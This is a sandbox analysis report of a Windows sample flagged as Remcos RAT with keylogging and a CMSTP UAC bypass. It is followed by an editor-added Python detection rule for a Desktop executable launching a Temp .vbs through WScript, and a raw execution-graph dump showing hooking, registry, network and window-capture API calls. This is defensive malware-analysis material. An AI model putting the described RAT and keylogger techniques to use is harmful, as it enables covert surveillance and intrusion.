Commandline: "C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"
Imagebase: 0x400000
File size: 493'056 bytes
MD5 hash: FA48843CE9A50A4BC84F6996923B7A27
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000000.1409380957.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.3307627880.000000000224F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.3307385684.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

Target ID: 7
Start time: 10:03:41
Start date: 08/01/2025
Path: C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"
Imagebase: 0x410000
File size: 147'456 bytes
MD5 hash: FF00E0480075B095948000BDC66E81F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
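Added example (editor's code, not part of the Joe Sandbox report): detection logic for the process pair shown above, an executable in a user-writable path (the sample on the Desktop) launching WScript.exe on a randomly named .vbs under %LOCALAPPDATA%\Temp, which is the pattern behind the script-host Sigma hits the report lists. Two details matter for a robust rule. First, the report's Path is C:\Windows\SysWOW64\wscript.exe while the command line names System32: the sample is a 32-bit process, so WOW64 file-system redirection resolves the System32 path to SysWOW64, and a rule keyed on the full image path would miss one of the two; the example matches on the basename. Second, the script argument is quoted, so the path must be pulled out of the command line rather than matched as a bare token. The event layout is a constructed, simplified record with the editor's own field names, the parent of Target 7 is assumed to be Target 0 (the report does not print a parent column), and the third event is a constructed benign control.

```python
# Added example, not from the Joe Sandbox report: detection logic for a
# user-writable executable spawning WScript/CScript on a script in Temp.
# EVENTS is a constructed record layout (field names are the editor's); the
# first two rows carry the report's paths, the third is a benign control.
import re
from typing import Dict, List, Tuple

SAMPLE = r"C:\Users\user\Desktop\17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10590f952.dat-decoded.exe"

EVENTS: List[Dict[str, str]] = [
    # Target 0 from the report; its parent is not printed there, so left blank.
    {"image": SAMPLE, "cmdline": f'"{SAMPLE}"', "parent_image": ""},
    # Target 7 from the report; parent assumed to be Target 0.
    {"image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\bmdbmsbytqzebij.vbs"',
     "parent_image": SAMPLE},
    # Constructed benign control: a vendor maintenance script started from Explorer.
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Program Files\Vendor\maint.vbs"',
     "parent_image": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# quoted or bare argument ending in a script-host extension
SCRIPT_ARG = re.compile(r'"([^"]+\.(?:vbs|vbe|js|jse|wsf|hta))"|(\S+\.(?:vbs|vbe|js|jse|wsf|hta))\b', re.I)
TEMP_DIRS = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Temp)\\", re.I)
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Desktop|Downloads|Documents|AppData)\\|\\ProgramData\\|\\Users\\Public\\", re.I)


def basename(path: str) -> str:
    """Last path component, lower-cased, so System32 and SysWOW64 compare equal."""
    return path.rsplit("\\", 1)[-1].lower()


def script_path(cmdline: str) -> str:
    """First script-file argument on the command line, quoted or bare ('' if none)."""
    m = SCRIPT_ARG.search(cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def evaluate(ev: Dict[str, str]) -> List[str]:
    """Names of the rules that fire for one process-creation event."""
    hits: List[str] = []
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return hits
    script = script_path(ev["cmdline"])
    if script and TEMP_DIRS.search(script):
        hits.append("script interpreter executing a script from a Temp folder")
    parent = ev.get("parent_image", "")
    if parent and USER_WRITABLE.search(parent) and basename(parent).endswith(".exe"):
        hits.append("WScript/CScript spawned by an executable in a user-writable path (dropper pattern)")
    return hits


def detect(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """(image, hits) for every event that triggers at least one rule."""
    out: List[Tuple[str, List[str]]] = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            out.append((ev["image"], hits))
    return out


if __name__ == "__main__":
    for image, hits in detect(EVENTS):
        print(image)
        for h in hits:
            print("  -", h)
```

Only the wscript.exe event from the report fires, on both rules; the sample itself is not a script host and the benign control runs a script from Program Files under explorer.exe. In a real deployment the parent-path rule is the higher-fidelity of the two, because legitimate logon scripts do run from Temp but are rarely launched by an .exe sitting on a user's Desktop.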


Execution Graph (rendered interactively in the original report; the raw node data is summarised below)

Execution Coverage: 4.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.9%
Total number of Nodes: 1452
Total number of Limit Nodes: 65

Graph nodes that resolve to API calls (address: APIs, with the symbol the report attached where it had one), recovered from the node data; the node list is truncated in the source:
0x41a543: InternetOpenW, InternetOpenUrlW; 0x41a56c: InternetReadFile; 0x41a5bc: InternetCloseHandle, InternetCloseHandle
0x426107: recv; 0x42611e: send
0x41bcf3: LoadLibraryA, GetProcAddress; 0x40d783: GetModuleFileNameW; 0x433ca4: GetModuleHandleW
0x4124b7: RegOpenKeyExA; 0x41265d: RegOpenKeyExA; 0x4126d2: RegCreateKeyA
0x4069ba: CreateProcessA, CloseHandle, CloseHandle (___scrt_fastfail); 0x40dd65: CreateThread; 0x40de8b: CreateThread; 0x40de41: StrToIntA
0x43294a: CryptAcquireContextA; 0x43296b: CryptGenRandom; 0x432980: CryptReleaseContext
0x433b54: IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter (___scrt_fastfail); 0x44336e: IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess; 0x433e1a: IsProcessorFeaturePresent; 0x437be7: RaiseException
0x446b38: RtlAllocateHeap; 0x44ba21: RtlReAllocateHeap; 0x446ae0: RtlFreeHeap; 0x446afb: GetLastError; 0x41d081: DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection (___scrt_fastfail); 0x444adc: EnterCriticalSection; 0x43aa1f: LeaveCriticalSection (std::_Lockit::~_Lockit)
46888->46891 46893 401d64 28 API calls 46889->46893 47365 43361d 22 API calls 3 library calls 46890->47365 46891->46881 48065 419138 109 API calls 2 library calls 46891->48065 46895 40df02 46893->46895 46894 40dec6 46896 401d64 28 API calls 46894->46896 46898 40df6c 46895->46898 46899 40df0e 46895->46899 46897 40ded8 46896->46897 46901 40dedf CreateThread 46897->46901 46902 401d64 28 API calls 46898->46902 46900 401d64 28 API calls 46899->46900 46904 40df1e 46900->46904 46901->46889 48064 419138 109 API calls 2 library calls 46901->48064 46903 40df75 46902->46903 46905 40df81 46903->46905 46906 40dfba 46903->46906 46907 401d64 28 API calls 46904->46907 46909 401d64 28 API calls 46905->46909 47162 41a7b2 GetComputerNameExW GetUserNameW 46906->47162 46910 40df33 46907->46910 46912 40df8a 46909->46912 47366 40c854 32 API calls 46910->47366 46917 401d64 28 API calls 46912->46917 46913 401e18 26 API calls 46914 40dfce 46913->46914 46916 401e13 26 API calls 46914->46916 46919 40dfd7 46916->46919 46920 40df9f 46917->46920 46918 40df46 46921 401e18 26 API calls 46918->46921 46922 40dfe0 SetProcessDEPPolicy 46919->46922 46923 40dfe3 CreateThread 46919->46923 46930 43a5f7 _strftime 42 API calls 46920->46930 46924 40df52 46921->46924 46922->46923 46925 40e004 46923->46925 46926 40dff8 CreateThread 46923->46926 48034 40e54f 46923->48034 46927 401e13 26 API calls 46924->46927 46928 40e019 46925->46928 46929 40e00d CreateThread 46925->46929 46926->46925 48066 410f36 138 API calls 46926->48066 46931 40df5b CreateThread 46927->46931 46933 40e073 46928->46933 46935 401f66 28 API calls 46928->46935 46929->46928 48062 411524 38 API calls ___scrt_fastfail 46929->48062 46932 40dfac 46930->46932 46931->46898 48063 40196b 49 API calls _strftime 46931->48063 47367 40b95c 7 API calls 46932->47367 47173 41246e RegOpenKeyExA 46933->47173 46936 40e046 46935->46936 47368 404c9e 28 API calls 46936->47368 46939 40e053 46941 401f66 28 API calls 46939->46941 46943 40e062 46941->46943 46942 40e12a 
47184 40cbac 46942->47184 46947 41a696 79 API calls 46943->46947 46945 41ae18 28 API calls 46946 40e0a4 46945->46946 47176 412584 RegOpenKeyExW 46946->47176 46949 40e067 46947->46949 46951 401eea 26 API calls 46949->46951 46951->46933 46954 401e13 26 API calls 46957 40e0c5 46954->46957 46955 40e0ed DeleteFileW 46956 40e0f4 46955->46956 46955->46957 46959 41ae18 28 API calls 46956->46959 46957->46955 46957->46956 46958 40e0db Sleep 46957->46958 47369 401e07 46958->47369 46961 40e104 46959->46961 47181 41297a RegOpenKeyExW 46961->47181 46964 401e13 26 API calls 46965 40e121 46964->46965 46966 401e13 26 API calls 46965->46966 46966->46942 46967->46653 46968->46660 46969->46657 46970->46667 46971->46669 46972->46672 46973->46647 46974->46650 46975->46654 46976->46676 46977->46679 46978->46681 46979->46678 46981 433c81 GetStartupInfoW 46980->46981 46981->46687 46983 44ddeb 46982->46983 46984 44dde2 46982->46984 46983->46690 46987 44dcd8 51 API calls 4 library calls 46984->46987 46986->46690 46987->46983 46989 41bd32 LoadLibraryA GetProcAddress 46988->46989 46990 41bd22 GetModuleHandleA GetProcAddress 46988->46990 46991 41bd5b 32 API calls 46989->46991 46992 41bd4b LoadLibraryA GetProcAddress 46989->46992 46990->46989 46991->46695 46992->46991 47373 41a64f FindResourceA 46993->47373 46996 43a89c ___std_exception_copy 21 API calls 46997 40e192 ctype 46996->46997 46998 401f86 28 API calls 46997->46998 46999 40e1ad 46998->46999 47000 401eef 26 API calls 46999->47000 47001 40e1b8 47000->47001 47002 401eea 26 API calls 47001->47002 47003 40e1c1 47002->47003 47004 43a89c ___std_exception_copy 21 API calls 47003->47004 47005 40e1d2 ctype 47004->47005 47376 406052 47005->47376 47007 40e205 47007->46697 47021 41afe6 47008->47021 47009 401eea 26 API calls 47010 41b088 47009->47010 47011 401eea 26 API calls 47010->47011 47013 41b090 47011->47013 47012 41b058 47014 403b60 28 API calls 47012->47014 47016 401eea 26 API calls 47013->47016 47017 41b064 47014->47017 47019 40d7c6 
47016->47019 47020 401eef 26 API calls 47017->47020 47018 401eef 26 API calls 47018->47021 47029 40e8bd 47019->47029 47022 41b06d 47020->47022 47021->47012 47021->47018 47024 401eea 26 API calls 47021->47024 47028 41b056 47021->47028 47379 403b60 47021->47379 47382 41bfb9 28 API calls 47021->47382 47023 401eea 26 API calls 47022->47023 47025 41b075 47023->47025 47024->47021 47383 41bfb9 28 API calls 47025->47383 47028->47009 47030 40e8ca 47029->47030 47032 40e8da 47030->47032 47400 40200a 26 API calls 47030->47400 47032->46705 47034 401d6c 47033->47034 47035 401d74 47034->47035 47401 401fff 28 API calls 47034->47401 47035->46712 47039 404ccb 47038->47039 47402 402e78 47039->47402 47041 404cee 47041->46719 47411 404bc4 47042->47411 47044 405cf4 47044->46723 47046 401efe 47045->47046 47048 401f0a 47046->47048 47420 4021b9 26 API calls 47046->47420 47048->46726 47051 401ec9 47049->47051 47050 401ee4 47050->46736 47051->47050 47052 402325 28 API calls 47051->47052 47052->47050 47421 401e8f 47053->47421 47055 40bee1 CreateMutexA GetLastError 47055->46752 47423 41b16b 47056->47423 47058 41a481 47427 412513 RegOpenKeyExA 47058->47427 47061 401eef 26 API calls 47062 41a4af 47061->47062 47063 401eea 26 API calls 47062->47063 47064 41a4b7 47063->47064 47065 412513 31 API calls 47064->47065 47066 41a50a 47064->47066 47067 41a4dd 47065->47067 47066->46757 47068 41a4e8 StrToIntA 47067->47068 47069 41a4ff 47068->47069 47070 41a4f6 47068->47070 47072 401eea 26 API calls 47069->47072 47432 41c112 28 API calls 47070->47432 47072->47066 47074 40698f 47073->47074 47075 4124b7 3 API calls 47074->47075 47076 406996 47075->47076 47076->46769 47076->46770 47078 41ae2c 47077->47078 47433 40b027 47078->47433 47080 41ae34 47080->46782 47082 401e27 47081->47082 47084 401e33 47082->47084 47442 402121 26 API calls 47082->47442 47084->46786 47086 402121 47085->47086 47087 402150 47086->47087 47443 402718 26 API calls _Deallocate 47086->47443 47087->46789 47090 4128c0 47089->47090 47091 406052 
28 API calls 47090->47091 47092 4128d5 47091->47092 47093 401fbd 28 API calls 47092->47093 47094 4128e5 47093->47094 47095 4126d2 29 API calls 47094->47095 47096 4128ef 47095->47096 47097 401eea 26 API calls 47096->47097 47098 4128fc 47097->47098 47098->46833 47100 401f6e 47099->47100 47444 402301 47100->47444 47104 412722 47103->47104 47106 4126eb 47103->47106 47105 401eea 26 API calls 47104->47105 47107 40dd3b 47105->47107 47108 4126fd RegSetValueExA RegCloseKey 47106->47108 47107->46836 47108->47104 47110 43a610 _strftime 47109->47110 47448 43994e 47110->47448 47114 41a747 47113->47114 47115 41a6ac GetLocalTime 47113->47115 47117 401eea 26 API calls 47114->47117 47116 404cbf 28 API calls 47115->47116 47118 41a6ee 47116->47118 47119 41a74f 47117->47119 47120 405ce6 28 API calls 47118->47120 47121 401eea 26 API calls 47119->47121 47123 41a6fa 47120->47123 47122 40ddaa 47121->47122 47122->46860 47482 4027cb 47123->47482 47125 41a706 47126 405ce6 28 API calls 47125->47126 47127 41a712 47126->47127 47485 406478 76 API calls 47127->47485 47129 41a720 47130 401eea 26 API calls 47129->47130 47131 41a72c 47130->47131 47132 401eea 26 API calls 47131->47132 47133 41a735 47132->47133 47134 401eea 26 API calls 47133->47134 47135 41a73e 47134->47135 47136 401eea 26 API calls 47135->47136 47136->47114 47138 409536 _wcslen 47137->47138 47139 409541 47138->47139 47140 409558 47138->47140 47141 40c89e 32 API calls 47139->47141 47142 40c89e 32 API calls 47140->47142 47143 409549 47141->47143 47144 409560 47142->47144 47145 401e18 26 API calls 47143->47145 47146 401e18 26 API calls 47144->47146 47161 409553 47145->47161 47147 40956e 47146->47147 47148 401e13 26 API calls 47147->47148 47149 409576 47148->47149 47505 40856b 28 API calls 47149->47505 47150 401e13 26 API calls 47152 4095ad 47150->47152 47490 409837 47152->47490 47153 409588 47506 4028cf 47153->47506 47157 409593 47158 401e18 26 API calls 47157->47158 47159 40959d 47158->47159 47160 401e13 26 API calls 47159->47160 
47160->47161 47161->47150 47686 403b40 47162->47686 47166 41a80d 47167 4028cf 28 API calls 47166->47167 47168 41a817 47167->47168 47169 401e13 26 API calls 47168->47169 47170 41a820 47169->47170 47171 401e13 26 API calls 47170->47171 47172 40dfc3 47171->47172 47172->46913 47174 41248f RegQueryValueExA RegCloseKey 47173->47174 47175 40e08b 47173->47175 47174->47175 47175->46942 47175->46945 47177 4125b0 RegQueryValueExW RegCloseKey 47176->47177 47178 4125dd 47176->47178 47177->47178 47179 403b40 28 API calls 47178->47179 47180 40e0ba 47179->47180 47180->46954 47182 412992 RegDeleteValueW 47181->47182 47183 40e117 47181->47183 47182->47183 47183->46964 47185 40cbc5 47184->47185 47186 41246e 3 API calls 47185->47186 47187 40cbcc 47186->47187 47191 40cbeb 47187->47191 47708 401602 47187->47708 47189 40cbd9 47711 4127d5 RegCreateKeyA 47189->47711 47192 413fd4 47191->47192 47193 413feb 47192->47193 47728 41aa83 47193->47728 47195 413ff6 47196 401d64 28 API calls 47195->47196 47197 41400f 47196->47197 47198 43a5f7 _strftime 42 API calls 47197->47198 47199 41401c 47198->47199 47200 414021 Sleep 47199->47200 47201 41402e 47199->47201 47200->47201 47202 401f66 28 API calls 47201->47202 47203 41403d 47202->47203 47204 401d64 28 API calls 47203->47204 47205 41404b 47204->47205 47206 401fbd 28 API calls 47205->47206 47207 414053 47206->47207 47208 41afd3 28 API calls 47207->47208 47209 41405b 47208->47209 47732 404262 WSAStartup 47209->47732 47211 414065 47212 401d64 28 API calls 47211->47212 47213 41406e 47212->47213 47214 401d64 28 API calls 47213->47214 47261 4140ed 47213->47261 47215 414087 47214->47215 47218 401d64 28 API calls 47215->47218 47216 401d64 28 API calls 47216->47261 47217 401fbd 28 API calls 47217->47261 47219 414098 47218->47219 47221 401d64 28 API calls 47219->47221 47220 41afd3 28 API calls 47220->47261 47222 4140a9 47221->47222 47224 401d64 28 API calls 47222->47224 47223 4085b4 28 API calls 47223->47261 47225 4140ba 47224->47225 47226 401d64 28 API calls 
47225->47226 47228 4140cb 47226->47228 47227 401eef 26 API calls 47227->47261 47229 401d64 28 API calls 47228->47229 47230 4140dd 47229->47230 47865 404101 87 API calls 47230->47865 47233 414244 WSAGetLastError 47866 41bc86 30 API calls 47233->47866 47238 414259 47242 401d8c 26 API calls 47238->47242 47243 401d64 28 API calls 47238->47243 47244 43a5f7 _strftime 42 API calls 47238->47244 47238->47261 47281 401f66 28 API calls 47238->47281 47282 41a696 79 API calls 47238->47282 47283 414b22 CreateThread 47238->47283 47284 401eea 26 API calls 47238->47284 47285 401e13 26 API calls 47238->47285 47867 404c9e 28 API calls 47238->47867 47869 40a767 84 API calls 47238->47869 47870 4047eb 98 API calls 47238->47870 47241 404cbf 28 API calls 47241->47261 47242->47238 47243->47238 47245 414b80 Sleep 47244->47245 47245->47238 47246 405ce6 28 API calls 47246->47261 47247 4027cb 28 API calls 47247->47261 47248 401f66 28 API calls 47248->47261 47249 41a696 79 API calls 47249->47261 47250 401eea 26 API calls 47250->47261 47253 4082dc 28 API calls 47253->47261 47254 440c61 26 API calls 47254->47261 47255 41265d 3 API calls 47255->47261 47256 412513 31 API calls 47256->47261 47257 403b40 28 API calls 47257->47261 47261->47216 47261->47217 47261->47220 47261->47223 47261->47227 47261->47233 47261->47238 47261->47241 47261->47246 47261->47247 47261->47248 47261->47249 47261->47250 47261->47253 47261->47254 47261->47255 47261->47256 47261->47257 47262 41ad56 28 API calls 47261->47262 47263 401d64 28 API calls 47261->47263 47733 413f9a 47261->47733 47738 4041f1 47261->47738 47745 404915 47261->47745 47760 40428c connect 47261->47760 47820 41a97d 47261->47820 47823 413683 47261->47823 47826 40cbf1 47261->47826 47832 41adfe 47261->47832 47835 41aed8 47261->47835 47262->47261 47264 4144ed GetTickCount 47263->47264 47265 41ad56 28 API calls 47264->47265 47277 414507 47265->47277 47267 41ad56 28 API calls 47267->47277 47270 41aed8 28 API calls 47270->47277 47272 405ce6 28 API calls 
47272->47277 47273 40275c 28 API calls 47273->47277 47274 4027cb 28 API calls 47274->47277 47276 401eea 26 API calls 47276->47277 47277->47267 47277->47270 47277->47272 47277->47273 47277->47274 47277->47276 47278 401e13 26 API calls 47277->47278 47839 41acb0 GetLastInputInfo GetTickCount 47277->47839 47840 41ac62 47277->47840 47845 40e679 GetLocaleInfoA 47277->47845 47848 4027ec 28 API calls 47277->47848 47849 4045d5 47277->47849 47868 404468 60 API calls ctype 47277->47868 47278->47277 47281->47238 47282->47238 47283->47238 48027 419e99 103 API calls 47283->48027 47284->47238 47285->47238 47286->46713 47287->46722 47290 4085c0 47289->47290 47291 402e78 28 API calls 47290->47291 47292 4085e4 47291->47292 47292->46744 47294 4124e1 RegQueryValueExA RegCloseKey 47293->47294 47295 41250b 47293->47295 47294->47295 47295->46740 47296->46747 47297->46776 47298->46770 47299->46760 47300->46774 47302 40c8ba 47301->47302 47303 40c8da 47302->47303 47304 40c90f 47302->47304 47305 40c8d0 47302->47305 48028 41a75b 29 API calls 47303->48028 47308 41b16b 2 API calls 47304->47308 47307 40ca03 GetLongPathNameW 47305->47307 47310 403b40 28 API calls 47307->47310 47311 40c914 47308->47311 47309 40c8e3 47312 401e18 26 API calls 47309->47312 47313 40ca18 47310->47313 47314 40c918 47311->47314 47315 40c96a 47311->47315 47353 40c8ed 47312->47353 47316 403b40 28 API calls 47313->47316 47318 403b40 28 API calls 47314->47318 47317 403b40 28 API calls 47315->47317 47320 40ca27 47316->47320 47321 40c978 47317->47321 47319 40c926 47318->47319 47327 403b40 28 API calls 47319->47327 48031 40cc37 28 API calls 47320->48031 47326 403b40 28 API calls 47321->47326 47322 401e13 26 API calls 47322->47305 47324 40ca3a 48032 402860 28 API calls 47324->48032 47329 40c98e 47326->47329 47330 40c93c 47327->47330 47328 40ca45 48033 402860 28 API calls 47328->48033 48030 402860 28 API calls 47329->48030 48029 402860 28 API calls 47330->48029 47334 40ca4f 47337 401e13 26 API calls 47334->47337 47335 40c999 
47338 401e18 26 API calls 47335->47338 47336 40c947 47339 401e18 26 API calls 47336->47339 47340 40ca59 47337->47340 47341 40c9a4 47338->47341 47342 40c952 47339->47342 47343 401e13 26 API calls 47340->47343 47344 401e13 26 API calls 47341->47344 47345 401e13 26 API calls 47342->47345 47346 40ca62 47343->47346 47347 40c9ad 47344->47347 47348 40c95b 47345->47348 47349 401e13 26 API calls 47346->47349 47350 401e13 26 API calls 47347->47350 47351 401e13 26 API calls 47348->47351 47352 40ca6b 47349->47352 47350->47353 47351->47353 47354 401e13 26 API calls 47352->47354 47353->47322 47355 40ca74 47354->47355 47356 401e13 26 API calls 47355->47356 47357 40ca7d 47356->47357 47357->46822 47358->46834 47359->46855 47361 412683 RegQueryValueExA RegCloseKey 47360->47361 47362 4126a7 47360->47362 47361->47362 47362->46815 47363->46848 47364->46884 47365->46894 47366->46918 47367->46906 47368->46939 47370 401e0c 47369->47370 47371->46767 47374 40e183 47373->47374 47375 41a66c LoadResource LockResource SizeofResource 47373->47375 47374->46996 47375->47374 47377 401f86 28 API calls 47376->47377 47378 406066 47377->47378 47378->47007 47384 403c30 47379->47384 47382->47021 47383->47028 47385 403c39 47384->47385 47388 403c59 47385->47388 47389 403c68 47388->47389 47394 4032a4 47389->47394 47391 403c74 47392 402325 28 API calls 47391->47392 47393 403b73 47392->47393 47393->47021 47395 4032b0 47394->47395 47396 4032ad 47394->47396 47399 4032b6 28 API calls 47395->47399 47396->47391 47400->47032 47404 402e85 47402->47404 47403 402ea9 47403->47041 47404->47403 47405 402e98 47404->47405 47406 402eae 47404->47406 47409 403445 28 API calls 47405->47409 47406->47403 47410 40225b 26 API calls 47406->47410 47409->47403 47410->47403 47412 404bd0 47411->47412 47415 40245c 47412->47415 47414 404be4 47414->47044 47416 402469 47415->47416 47418 402478 47416->47418 47419 402ad3 28 API calls 47416->47419 47418->47414 47419->47418 47420->47048 47422 401e94 47421->47422 47424 41b193 47423->47424 47425 
41b178 GetCurrentProcess IsWow64Process 47423->47425 47424->47058 47425->47424 47426 41b18f 47425->47426 47426->47058 47428 412541 RegQueryValueExA RegCloseKey 47427->47428 47429 412569 47427->47429 47428->47429 47430 401f66 28 API calls 47429->47430 47431 41257e 47430->47431 47431->47061 47432->47069 47434 40b02f 47433->47434 47437 40b04b 47434->47437 47436 40b045 47436->47080 47438 40b055 47437->47438 47440 40b060 47438->47440 47441 40b138 28 API calls 47438->47441 47440->47436 47441->47440 47442->47084 47443->47087 47445 40230d 47444->47445 47446 402325 28 API calls 47445->47446 47447 401f80 47446->47447 47447->46827 47466 43a555 47448->47466 47450 43999b 47475 4392ee 38 API calls 3 library calls 47450->47475 47451 439960 47451->47450 47452 439975 47451->47452 47465 40dd54 47451->47465 47473 445364 20 API calls __dosmaperr 47452->47473 47455 43997a 47474 43a837 26 API calls _Deallocate 47455->47474 47456 4399a7 47459 4399d6 47456->47459 47476 43a59a 42 API calls __Toupper 47456->47476 47462 439a42 47459->47462 47477 43a501 26 API calls 2 library calls 47459->47477 47478 43a501 26 API calls 2 library calls 47462->47478 47463 439b09 _strftime 47463->47465 47479 445364 20 API calls __dosmaperr 47463->47479 47465->46842 47465->46844 47467 43a55a 47466->47467 47468 43a56d 47466->47468 47480 445364 20 API calls __dosmaperr 47467->47480 47468->47451 47470 43a55f 47481 43a837 26 API calls _Deallocate 47470->47481 47472 43a56a 47472->47451 47473->47455 47474->47465 47475->47456 47476->47456 47477->47462 47478->47463 47479->47465 47480->47470 47481->47472 47486 401e9b 47482->47486 47484 4027d9 47484->47125 47485->47129 47487 401ea7 47486->47487 47488 40245c 28 API calls 47487->47488 47489 401eb9 47488->47489 47489->47484 47491 409855 47490->47491 47492 4124b7 3 API calls 47491->47492 47493 40985c 47492->47493 47494 409870 47493->47494 47495 40988a 47493->47495 47496 4095cf 47494->47496 47497 409875 47494->47497 47509 4082dc 47495->47509 47496->46879 47500 4082dc 28 API 
calls 47497->47500 47502 409883 47500->47502 47535 409959 29 API calls 47502->47535 47504 409888 47504->47496 47505->47153 47677 402d8b 47506->47677 47508 4028dd 47508->47157 47510 4082eb 47509->47510 47536 408431 47510->47536 47512 408309 47513 4098a5 47512->47513 47541 40affa 47513->47541 47516 4098f6 47519 401f66 28 API calls 47516->47519 47517 4098ce 47518 401f66 28 API calls 47517->47518 47520 4098d8 47518->47520 47521 409901 47519->47521 47523 41ae18 28 API calls 47520->47523 47522 401f66 28 API calls 47521->47522 47524 409910 47522->47524 47525 4098e6 47523->47525 47526 41a696 79 API calls 47524->47526 47545 40a876 31 API calls ___std_exception_copy 47525->47545 47528 409915 CreateThread 47526->47528 47530 409930 CreateThread 47528->47530 47531 40993c CreateThread 47528->47531 47557 4099a9 47528->47557 47529 4098ed 47532 401eea 26 API calls 47529->47532 47530->47531 47554 409993 47530->47554 47533 401e13 26 API calls 47531->47533 47551 4099b5 47531->47551 47532->47516 47534 409950 47533->47534 47534->47496 47535->47504 47676 40999f 135 API calls 47535->47676 47537 40843d 47536->47537 47539 40845b 47537->47539 47540 402f0d 28 API calls 47537->47540 47539->47512 47540->47539 47543 40b006 47541->47543 47542 4098c3 47542->47516 47542->47517 47543->47542 47546 403b9e 47543->47546 47545->47529 47547 403ba8 47546->47547 47549 403bb3 47547->47549 47550 403cfd 28 API calls 47547->47550 47549->47542 47550->47549 47560 40a3f4 47551->47560 47609 4099e4 47554->47609 47631 409e48 47557->47631 47566 40a402 47560->47566 47561 4099be 47562 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47563 40b027 28 API calls 47562->47563 47563->47566 47566->47561 47566->47562 47568 41acb0 GetLastInputInfo GetTickCount 47566->47568 47569 40a4a2 GetWindowTextW 47566->47569 47571 401e13 26 API calls 47566->47571 47572 40a5ff 47566->47572 47573 40affa 28 API calls 47566->47573 47575 40a569 Sleep 47566->47575 47578 401f66 28 API calls 47566->47578 47579 40a4f1 47566->47579 47583 405ce6 
28 API calls 47566->47583 47585 4028cf 28 API calls 47566->47585 47586 41ae18 28 API calls 47566->47586 47587 409d58 27 API calls 47566->47587 47588 401eea 26 API calls 47566->47588 47589 433529 5 API calls __Init_thread_wait 47566->47589 47590 4338b5 29 API calls __onexit 47566->47590 47591 4334df EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47566->47591 47592 4082a8 28 API calls 47566->47592 47594 40b0dd 28 API calls 47566->47594 47595 40ae58 44 API calls 2 library calls 47566->47595 47596 440c61 47566->47596 47600 404c9e 28 API calls 47566->47600 47568->47566 47569->47566 47571->47566 47574 401e13 26 API calls 47572->47574 47573->47566 47574->47561 47575->47566 47578->47566 47579->47566 47581 4082dc 28 API calls 47579->47581 47593 40a876 31 API calls ___std_exception_copy 47579->47593 47581->47579 47583->47566 47585->47566 47586->47566 47587->47566 47588->47566 47589->47566 47590->47566 47591->47566 47592->47566 47593->47579 47594->47566 47595->47566 47597 440c6d 47596->47597 47601 440a5d 47597->47601 47600->47566 47602 440a74 47601->47602 47606 440ab5 47602->47606 47607 445364 20 API calls __dosmaperr 47602->47607 47604 440aab 47608 43a837 26 API calls _Deallocate 47604->47608 47606->47566 47607->47604 47608->47606 47610 409a63 GetMessageA 47609->47610 47611 4099ff SetWindowsHookExA 47609->47611 47612 409a75 TranslateMessage DispatchMessageA 47610->47612 47624 40999c 47610->47624 47611->47610 47614 409a1b GetLastError 47611->47614 47612->47610 47612->47624 47625 41ad56 47614->47625 47618 409a3e 47619 401f66 28 API calls 47618->47619 47620 409a4d 47619->47620 47621 41a696 79 API calls 47620->47621 47622 409a52 47621->47622 47623 401eea 26 API calls 47622->47623 47623->47624 